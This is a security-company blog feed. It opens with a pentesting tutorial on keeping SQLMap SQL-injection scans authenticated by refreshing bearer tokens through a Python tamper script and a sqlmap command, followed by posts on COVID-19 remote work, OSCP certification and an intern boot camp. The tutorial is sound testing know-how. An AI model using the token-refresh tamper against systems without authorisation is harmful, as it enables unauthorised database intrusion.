<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;">When using SQLMap to test the web application for potential SQL injection vulnerabilities, this became an issue: once the application required re-authentication and issued a new token, the requests SQLMap kept sending with the old token resulted in a 401 error.</span></div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;"><br /></span></div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;">I came up with a solution to this problem when using SQLMap, by requesting a new token and then changing the authorisation header, which would then result in this problem being bypassed.</span></div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;"><br /></span></div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;">Below is the example of how this was successfully achieved.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0DmZ6IWF-5ddLMvYB9SXupxziC97FL9OKrk6NgvRoIrijGlhiHVNlr9cK8x2WfHS2okMjjLbIL25b8OwgtnzHVLkXZNr_a3rbtaOIXAfwbpmD6T9_c2VtNXxazZiU2E4Cnj1ZzjGYCuc2/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="194" data-original-width="599" height="204" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0DmZ6IWF-5ddLMvYB9SXupxziC97FL9OKrk6NgvRoIrijGlhiHVNlr9cK8x2WfHS2okMjjLbIL25b8OwgtnzHVLkXZNr_a3rbtaOIXAfwbpmD6T9_c2VtNXxazZiU2E4Cnj1ZzjGYCuc2/s640/1.png" width="640" /></a></div>
<br />
<div style="font-family: Candara; font-size: 11px; font-stretch: normal; line-height: normal; margin-bottom: 8px; text-align: center;">
First the request for a new token was sent to the application:</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">As can be seen below, this request then responded back with JSON, containing an “access_token” which could then be used in the next request:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidFfXBwVkMnIy6LT0yIEkMup0ZoDJBUY-m61TBEgYHOgRDB9zAQR1KWqlxs4J6_b2vPPovelYyKbYE4cZUHzaBpD9FNSVKBSmNLCPHZ4vwuHYpXZCydP8IVfJC2ofI3g0T63RZE2T0p0y5/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="327" data-original-width="1372" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidFfXBwVkMnIy6LT0yIEkMup0ZoDJBUY-m61TBEgYHOgRDB9zAQR1KWqlxs4J6_b2vPPovelYyKbYE4cZUHzaBpD9FNSVKBSmNLCPHZ4vwuHYpXZCydP8IVfJC2ofI3g0T63RZE2T0p0y5/s640/2.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="font-family: Candara; font-size: 11px; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<br /></div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;">For the next step, I then used Python to recreate the POST request in a script. In the screenshot below, you can see the code that was used for the POST request:</span></div>
<div style="font-family: Candara; font-size: 11px; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF6IIh-FZ4pJCwTB4scDgnxIcqHJgM_T_BR5LIC5iLH9VXQwR6SKQskRXPvY3CYUlVR7U24F6tmCbCP_SGYYP9yF5Hlnni18WAkfzhSQCMZ6nh4DaR1ZfKw9-8tnGhxVThNatNxmsutwFy/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="112" data-original-width="468" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF6IIh-FZ4pJCwTB4scDgnxIcqHJgM_T_BR5LIC5iLH9VXQwR6SKQskRXPvY3CYUlVR7U24F6tmCbCP_SGYYP9yF5Hlnni18WAkfzhSQCMZ6nh4DaR1ZfKw9-8tnGhxVThNatNxmsutwFy/s640/3.png" width="640" /></a></div>
<div style="font-family: Candara; font-size: 11px; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<br /></div>
<div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;">In addition to the above code, the authorisation header should be rewritten with the new token before every request that is sent by SQLMap, as can be seen below:</span></div>
<div style="font-family: Candara; font-size: 11px; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_Wm2M6VVwhZV4C6vA8jRVV9GlNIjzuV66cAqgvLZo_bSmX95Flb3_HxBWF2oZGEIwtDJvyzbIP-JfFOLyx2iFyNUUkcH-bDAs_2kRlMqGsxzWmZMUzQiLMQmaFdCJRhIxiYR_t8NSklX_/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="194" data-original-width="468" height="264" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_Wm2M6VVwhZV4C6vA8jRVV9GlNIjzuV66cAqgvLZo_bSmX95Flb3_HxBWF2oZGEIwtDJvyzbIP-JfFOLyx2iFyNUUkcH-bDAs_2kRlMqGsxzWmZMUzQiLMQmaFdCJRhIxiYR_t8NSklX_/s640/4.png" width="640" /></a></div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;">The full tamper script should then look like the code in the screenshot below:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhknDkNSM9flxODQSs-sEorX78KOeighilmN4QTXFIcjKi7rzB69FF6sDZj2ZEnYYopM5izvGbgaDcW90SHeGdi2uZ-0VLgDrTqNicS-N7l9gt9KS1T3rPdPiAsDCj9Ls6kS-aXdNMzfb8R/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="564" data-original-width="468" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhknDkNSM9flxODQSs-sEorX78KOeighilmN4QTXFIcjKi7rzB69FF6sDZj2ZEnYYopM5izvGbgaDcW90SHeGdi2uZ-0VLgDrTqNicS-N7l9gt9KS1T3rPdPiAsDCj9Ls6kS-aXdNMzfb8R/s640/5.png" width="529" /></a></div>
<div style="font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;"><span style="font-family: Candara;">Lastly, in the screenshot below you can see the command for executing the tamper script against a target using SQLMap (</span><i>sqlmap -u <a href="https://url.com/">https://url.com/</a> --tamper bypass.py</i>)<span style="font-family: Candara;">:</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMU7UUji78h0oKlhyMmXVfgSRIRuapHsLmEFNLsP_wcJmIea0cqn49od1beC47E5HJj_wowQKVZIRqMtQ_F0Lcpm_GrSVPTrn78mEfaIq0wGbbEYt_tC9WNV3i3P0zzHcS9JnAp-L7XSah/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="478" data-original-width="974" height="312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMU7UUji78h0oKlhyMmXVfgSRIRuapHsLmEFNLsP_wcJmIea0cqn49od1beC47E5HJj_wowQKVZIRqMtQ_F0Lcpm_GrSVPTrn78mEfaIq0wGbbEYt_tC9WNV3i3P0zzHcS9JnAp-L7XSah/s640/6.png" width="640" /></a></div>
<div>
<br /></div>
<br />
<div style="font-family: Candara; font-size: 11px; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
</div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;">At this point, requests are sent correctly by refreshing the token and you will no longer receive a 401 error message. </span></div>
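<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;">The code in this post is shown only in screenshots, so the following is an added example and not the author's script: a tamper module that sets the Authorization header before each SQLMap request and, going beyond the post, asks for a new token only when the JWT's exp claim is close, so the token endpoint is not called on every request. The endpoint URL, credentials, Bearer scheme, cache names and Python 3 are assumptions; only the “access_token” field comes from the post.</span></div>

```python
"""Added example: sqlmap tamper module that keeps a bearer token fresh."""
import base64
import json
import time
import urllib.request

try:  # importable only when sqlmap loads this file through --tamper
    from lib.core.enums import PRIORITY
    __priority__ = PRIORITY.NORMAL
except ImportError:  # lets the module be imported and tested stand-alone
    __priority__ = None

# Assumptions, not taken from the post: endpoint, request body, auth scheme.
TOKEN_URL = "https://url.com/api/token"  # placeholder endpoint
TOKEN_REQUEST = {"username": "PLACEHOLDER_USER", "password": "PLACEHOLDER_PASS"}
REFRESH_MARGIN = 30  # seconds before expiry at which a new token is requested

TOKEN_CACHE = {"token": None, "exp": 0.0}


def make_sample_jwt(exp):
    """Build a constructed, unsigned sample token (offline testing only)."""
    def enc(obj):
        raw = json.dumps(obj).encode()
        return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()
    return ".".join([enc({"alg": "HS256", "typ": "JWT"}), enc({"exp": exp}), "constructed"])


def jwt_expiry(token):
    """Return the exp claim as a float, or 0.0 when it cannot be read."""
    try:
        segment = token.split(".")[1]
        segment += "=" * (-len(segment) % 4)  # restore stripped padding
        claims = json.loads(base64.urlsafe_b64decode(segment))
        return float(claims.get("exp", 0))
    except (IndexError, ValueError, TypeError, AttributeError):
        return 0.0


def request_token():
    """POST to the token endpoint and return the access_token field."""
    body = json.dumps(TOKEN_REQUEST).encode()
    req = urllib.request.Request(
        TOKEN_URL, data=body, headers={"Content-Type": "application/json"}
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.loads(resp.read().decode())["access_token"]


def current_token(fetch=request_token, now=time.time):
    """Return the cached token, fetching a new one when it is near expiry.

    A token without a readable exp claim is treated as already expired, so
    the module then requests a token before every request, as in the post.
    """
    if TOKEN_CACHE["token"] is None or now() >= TOKEN_CACHE["exp"] - REFRESH_MARGIN:
        token = fetch()
        TOKEN_CACHE["token"] = token
        TOKEN_CACHE["exp"] = jwt_expiry(token)
    return TOKEN_CACHE["token"]


def dependencies():
    pass


def tamper(payload, **kwargs):
    """sqlmap hook: leave the payload unchanged, rewrite the auth header."""
    headers = kwargs.get("headers")
    if headers is not None:
        headers["Authorization"] = "Bearer " + current_token()
    return payload
```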
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px; min-height: 13px;">
</div>
<div style="font-family: Candara; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<span style="font-size: large;">I hope you have found this information to be of value and that it will assist you in future penetration tests.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">- Blog post by Motaz of Telspace Systems.</span></div>
<div style="font-family: Candara; font-size: 11px; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<br /></div>
<div style="font-family: Candara; font-size: 11px; font-stretch: normal; line-height: normal; margin-bottom: 8px;">
<br /></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-64868671775202112292020-03-15T23:03:00.000+02:002020-03-15T23:03:08.028+02:00COVID-19 – Closed Offices<div class="MsoNormal" style="color: black; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="font-family: inherit;">At Telspace we put our employees, clients, community and country first in everything we do. In line with this, we have decided to close our physical offices and all our staff will be working remotely. By doing so, we can hopefully reduce the risk of COVID-19 further spreading. This post outlines why we are doing this and how this will affect our day to day operations and community engagements. <o:p></o:p></span></div>
<div class="MsoNormal" style="color: black; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="color: black; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="font-family: inherit;"><b><u>Why?</u></b><o:p></o:p></span></div>
<div class="MsoNormal" style="color: black; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="color: black; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="font-family: inherit;">Surely this is an overreaction given we are a company with fewer than 100 people? Aren’t we just spreading more fear / panic? No and no. Won’t this result in a negative financial impact to Telspace? Potentially yes, due to factors outside of our control, but there are more important things happening right now and we will always ensure that our services meet the highest quality standards our clients have come to expect.</span></div>
<div class="MsoNormal" style="color: black; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="color: black; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="font-family: inherit;">We want to be proactive in protecting ourselves and everyone else, and therefore we call on companies in our industry, and any companies outside our industry that can do the same, to follow suit. Prevention is better than cure, as the saying goes.</span></div>
<div class="MsoNormal" style="color: black; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="color: black; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="font-family: inherit;"><b><u>Telspace Conference 2020</u></b><o:p></o:p></span></div>
<div class="MsoNormal" style="color: black; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="color: black; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="font-size: medium;">
<span style="font-family: inherit;">Our client-only conference was scheduled to take place on the 31<sup>st </sup>of March and we were expecting a large number of attendees. We are excited to inform you that our conference will still be going ahead, albeit in a digital format as follows:</span></div>
<br /></div>
<ul>
<li><div style="font-size: medium;">
<span style="font-family: inherit;">Our talks will now be given virtually and will be accessible to all our clients to log onto / participate in. </span></div>
</li>
</ul>
<ul>
<li><div style="font-size: medium;">
<span style="font-family: inherit;">All swag / gifts that were going to be given out at the conference will instead be kept and distributed to clients once the pandemic has been resolved.</span><br />
<span style="font-family: inherit;"><br /></span></div>
</li>
</ul>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;"><b><u>Key Account Managers</u></b><o:p></o:p></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;">We love the personal touch that comes from meeting face to face with our clients, but with COVID-19, the fewer in-person meetings, the safer. As such, all our sales / key account managers will now be required to conduct meetings / catchups virtually via Google Hangouts, Skype, Zoom etc. For more sensitive conversations / discussions, we would encourage clients to use platforms such as Signal instead of requiring that we come onsite for the meetings.</span></div>
<div class="MsoNormal" style="font-size: medium;">
<br /></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;"><b><u>Security Assessments / Penetration Tests</u></b><o:p></o:p></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;">The good news is that we are prepared for a remote working scenario and therefore will still be able to provide you with uninterrupted services of the highest quality. All of our assessments can be conducted remotely provided we are given VPN access to the client’s environments. Alternatively, we can provide clients with our own TelspaceConnect Boxes. A TelspaceConnect Box is essentially a box that allows us to connect remotely to a client’s network to conduct the assessment: just plug it into the network where it’s required and we will do the rest.</span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;">For more specialised assessments, we are happy to work with clients to find the best way to conduct the assessment. <o:p></o:p></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;">Report presentations will be done virtually via Google Hangouts, Skype, Zoom etc. For more sensitive presentations, we would encourage clients to use platforms such as Signal instead of requiring that we come onsite for the presentations. <o:p></o:p></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;"><b><u>Training</u></b><o:p></o:p></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;">All of our training can be given virtually. To assist students with any issues they may have with the practical aspects of the training, a remote connection to the student’s computer / host would be required.</span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="font-size: medium;">
<b><u><span style="font-family: inherit;">Conclusion<o:p></o:p></span></u></b></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;">We would like to wish everyone the very best during this difficult time and we hope that you will be safe. We are confident that if we all work together proactively in preventing the spread of COVID-19, we will collectively be able to defeat it.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span style="font-family: inherit;">Dino, Manny and Tim (Telspace Management Team)</span><span style="font-family: "liberation" serif , serif;"><o:p></o:p></span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-16797826937792914842020-02-18T10:00:00.000+02:002020-02-18T10:22:59.823+02:00From Intern to OSCP Certified<br />
I received a delivery from DHL on Friday, and there was a distinct lump in my throat when I opened the package which contained that pristine white cardboard folder, holding <u><b>MY</b></u> OSCP certificate. I had dreamed of seeing my name on those silver letters - and now I did. <br />
<br />
I posted a photograph of the certificate on my LinkedIn and received an overwhelming response. So many people were curious about how they too could complete the PWK course, or they wanted advice - or to know how I transitioned from being an Architect (the construction kind) to a Pentester. <br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">There
are many blogs about the OSCP, which provide tips and advice on the best way
to tackle the course and approach the exam. I read many of them, and
found them helpful - and I encourage anyone reading this to do the same. </span><br />
<br />
<span style="font-size: small;">I also want to state at the very beginning of this blog that I certainly do not claim to be an expert in any way whatsoever. I am
continuously humbled by how much there is to learn, the people I have the privilege to work
with, as well as the colleagues in this industry at large</span><span style="font-size: small;">. </span><br />
<br />
<span style="font-size: small;">Everyone has their own story to tell, this is
mine.</span><br />
<h2>
<u><br /></u></h2>
<h2>
<u>PRE-INTERNSHIP</u></h2>
<div>
<u><br /></u></div>
I discovered Security somewhat by chance from someone who has a deep passion for their career as a penetration tester, and would speak about it constantly. Their level of enthusiasm was undeniable and I found it contagious - my curiosity had been piqued and I couldn't help myself - I wanted to know more... and that's the thing, it's at that exact moment where <i>it</i> happens:<br />
<b><br /></b>
<b>Security needs to grab a hold of you, and you have no urge to escape it...</b><br />
<br />
(NOTE: This may seem like an obvious thing to say, but is an important part of the process, because if this is not your passion - you're going to have a very bad time.) <br />
<br />
I had no background in IT whatsoever, and needed to start learning some basics. Like many others who find themselves interested in 'InfoSec', I started on the journey to find out more.<br />
<br />
This process seems to have two main parts. On the one hand, I was pleasantly surprised to discover that many good-quality resources exist - mostly for free. Coming from a university background, I found it incredible that so many people had so freely given their knowledge away for others to learn. On the other hand, there was just SO much to learn - where on earth do you start?<br />
<br />
My advice is: just start. Somewhere. Anywhere.<br />
<br />
If you are like me, previously with very limited knowledge, everything will seem disjointed at first and you will feel like you're learning many different concepts in isolation... but KEEP AT IT! Eventually, slowly but surely - all of these little things will start to link up and become clearer as part of 'the bigger picture', and the satisfaction of those 'ah-ha' moments is unparalleled.<br />
<h3>
<span style="color: #3d85c6;"><b>PRE-INTERNSHIP TLDR:</b></span></h3>
<ul>
<li>Start with learning the basics: <i>Cybrary</i> is a good place to start as well as <i>Over The Wire</i> war games. </li>
<li>Keep at it!</li>
</ul>
<div>
<br /></div>
<h2>
<u>INTERNSHIP PART 1</u></h2>
<div>
<u><br /></u></div>
Just like there is no 'right' way to start learning about security, there is no correct way to get started in the industry. Get onto <a href="https://twitter.com/telspacesystems" target="_blank">Twitter</a>, and tap into the massive community that is active there, find out about the Pentesting Companies in your country, local industry events, then network, talk to people and get involved.<br />
<br />
After I had spent a few months doing self-study, I emailed Telspace Systems to introduce myself and ask for advice about how to get started in the industry. The response I received from Manuel Corregedor informed me about an upcoming Internship program and asked if I would like to participate in an interview. Thankfully, the little bit of technical knowledge I had managed to gain (while running a full-time business of my own) meant I met the criteria, and was offered a position at the Boot Camp which started on <a href="https://blog.telspace.co.za/2019/03/telspace-systems-internshipboot-camp.html" target="_blank">4 March 2019</a>. As they say - the rest is history (with a lot of blood, sweat and tears involved)! <br />
<br />
I am aware that a lot of people experience considerable barriers to entry. If this is the case - please do not give up. Please keep trying to find the place that fits you... and when you do find that place and start to make progress, please keep 'paying it forward'. This is a huge part of the Telspace Systems "mantra". As far as I am concerned - opening doors for others and giving back is a big part of the process. Security would not be the awesome industry that it is, if everyone kept their magic to themselves.<br />
<h3>
<span style="color: #3d85c6;"><b>INTERNSHIP 1 TLDR:</b></span></h3>
<ul>
<li>Get involved with the community, until you can get your foot in the door. </li>
<li>Keep at it!</li>
</ul>
<div>
<br /></div>
<h2>
<u>INTERNSHIP PART 2</u></h2>
<div>
<u><br /></u></div>
The internship at Telspace Systems is simultaneously gruelling, and immense fun. The Boot Camp is designed to be high-pace, and really test potential analysts in a variety of ways.<br />
<br />
I have been immensely lucky to receive training from world-class pen-testers, who I have the utmost respect for. The knowledge that is shared during an internship is priceless, and can vastly accelerate your learning experience.<br />
<br />
It is however worth keeping in mind that (during an internship) all candidates are given the same information to learn, and opportunities for growth - but the rest is up to you! You have to spend time doing self study, because there is not a single pentester on earth who can hand-hold an intern/beginner the whole way through the process... and it would not make sense to either - learning HOW to google, and deal with unfamiliar situations is part of this job!<br />
<h3>
<span style="color: #3d85c6;"><b>INTERNSHIP 2 TLDR:</b></span></h3>
<ul>
<li>Learn as much as you can, and make the most of your opportunities. </li>
<li>Keep at it!</li>
</ul>
<div>
<br /></div>
<h2>
<u>Junior Analyst/OSCP</u></h2>
<div>
<u><br /></u></div>
The interns who successfully complete a Telspace Systems <a href="http://blog.telspace.co.za/2020/01/boot-camp-2020.html" target="_blank">Boot Camp</a>, are offered a 6 month contract position, and are required to start with the <a href="https://www.offensive-security.com/" target="_blank">Offensive Security</a> <a href="https://www.offensive-security.com/pwk-oscp/" target="_blank">Penetration Testing with Kali</a> course immediately.<br />
<br />
During these 6 months, the Juniors get to shadow analysts on assessments, complete their <a href="https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf" target="_blank">studies</a>, conduct <a href="http://blog.telspace.co.za/2019/05/put-words-in-my-mouth.html" target="_blank">research</a>, attend events and learn more about the industry. At the end of the 6 month period, every Junior Analyst needs to demonstrate excellence in multiple aspects in order to receive a permanent position here at Telspace Systems.<br />
<br />
This requires a lot of hard work and dedication - and comes back to what I said in the very beginning about passion for this as a <b>career</b>, not a nine-to-five 'job'. Your attitude has to be the former to make tangible progress. <br />
<br />
As far as actual OSCP preparation goes, this is my advice in a nutshell:<br />
<ul>
<li>Read through the PDF manual. OffSec are trying to teach you certain principles contained in that document - so do not toss it aside. </li>
<li>Manage your time carefully, because you get to keep the PDF, but your lab-time is ticking.</li>
<li>Choose the longest lab-time package possible (or the one that you feel is suitable, depending on your skill level). </li>
<li>Spend as much time <span style="color: #0b5394;"><b>practicing</b></span> in the labs as you can. </li>
<li>Exploit manually, rather than relying on Metasploit. You will thank me when it comes to exam time and to your actual assessments in real life!</li>
<li>If your lab time runs out, consider extending it or signing up for a paid subscription like <a href="https://www.hackthebox.eu/" target="_blank">Hack the Box.</a></li>
<li>Have you Googled it? </li>
<li>Keep at it, if that isn't working then you need to <a href="https://www.offensive-security.com/why-offsec/#try-harder" target="_blank">Try Harder</a>!</li>
</ul>
Passing the PWK exam to become OSCP certified is no easy task. There is a lot to learn, and the actual
exam is 24 hours long, with a further 24 hours provided as Reporting Time. (NOTE: The PWK was updated last week, and the course structure has changed. There may be changes to the exam too that I am not aware of). <br />
<br />
This is arduous, just because of the sheer length of the exam. So I recommend that you write this in a space where you feel comfortable, where you know you will have uninterrupted access to electricity and Wi-Fi (a real problem in South Africa unfortunately), have plenty of snacks, and finally - my mentor Dino Covotsos gave the great advice to take breaks and rest.<br />
<br />
It can be easy to get fixated on a rabbit hole, and lose hours of time trying to get one thing to work. You will be amazed at the other possibilities that pop into your head during a short walk or nap!<br />
<br />
<h2>
<u>Failing</u></h2>
<div>
<u><br /></u></div>
This is a hard one to talk about, but something worth consideration BEFORE your first attempt.<br />
<br />
There are people who do pass on their first attempt - I was not one of those people. If, like me, you fail an attempt at the OSCP (or any
exam for that matter), being able to identify your weaknesses so that
you can improve upon them means that you are still able to gain
something from the experience.<br />
<br />
However, failing was not something I was used to. It can be very discouraging and make you feel like you're not capable, smart enough, or meant for this industry; and it is admittedly difficult to keep those mind-monsters in check sometimes. Thankfully, some of the most talented people in the industry have openly admitted to feeling like they are failures, suffer from imposter syndrome and often feel demotivated.<br />
<br />
It is absolutely normal to feel a bit rubbish after failing, but this is where your passion enters the equation again. <b>Where you refuse to lose!</b> Give yourself some time to accept failure, then pick yourself up and figure out your game-plan. All part of what we learnt during the internship process with Telspace Systems initially.<br />
<br />
It is not possible to be good at everything, and it takes time and effort to learn any skill - thank you Dino Covotsos and Manuel Corregedor for encouraging me not to shy away from my weaknesses - keep learning and practicing.<br />
<h3>
<span style="color: #3d85c6;"><b>FAILURE TLDR:</b></span></h3>
<ul>
<li>Failing sucks, but figure out where you need to improve.</li>
<li>Keep at it! </li>
</ul>
<div>
<br /></div>
<h2>
<u>Passing</u></h2>
<div>
<u><br /></u></div>
Nothing on earth could compare to the <a href="https://media.giphy.com/media/IB9foBA4PVkKA/giphy.gif" target="_blank">feeling</a> you get when you open the email from Offensive Security and see it starts with "<i>We are happy to inform you...</i>".<br />
<br />
The hours of work, the dedication, the proverbial 'blood, sweat and tears' - are well worth it.<br />
<h3>
<span style="color: #3d85c6;"><b>PASSING TLDR:</b></span></h3>
<ul>
<li>Passing is AWESOME, but never stop learning. </li>
<li>Keep at it!</li>
</ul>
Telspace Systems have given me a wonderful opportunity, which I am incredibly grateful for. I was delighted to be one of the analysts involved in our current Internship program, and to be able to pass some of my knowledge on to those hungry to learn.<br />
<br />
Thank you to every single person who has been part of my journey. To those who have taught me, to those who have underestimated me and said I did not deserve this (<b>because you made me fight for it harder</b>), but mostly to those who understand that to achieve great things takes immense hard work and lead by fantastic example. <br />
<br />
Post by Amy Manià<br />
<b><span style="color: #0b5394;"></span></b>Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-23623355059337424192020-01-16T09:34:00.001+02:002022-07-13T07:10:21.685+02:00Boot Camp: 2020<div style="line-height: 100%; margin-bottom: 0cm;">
Telspace has kicked off 2020 with a fresh intake of interns into our
Boot Camp program. After approximately 100 grueling interviews, eight
candidates were selected and invited to attend the Boot Camp.
Congratulations to all that made it!</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
They are already
knee-deep in the program, having submitted research proposals,
completed assignments and braved their way through two simulated (CTF
style) assessments!
</div>
<div class="separator" style="clear: both; text-align: center;"><br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
We asked them for some feedback on their experience so far:</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<i>It's grueling, and I
honestly don't know where my socks are when I wake up in the mornings
anymore, but I'm loving every second of it</i> - Rico</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<i>I think a bootcamp
is a life changing experience, it's like a pressure cooker but in a
good way. So here I am to get my hack on </i>- Lorthar</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
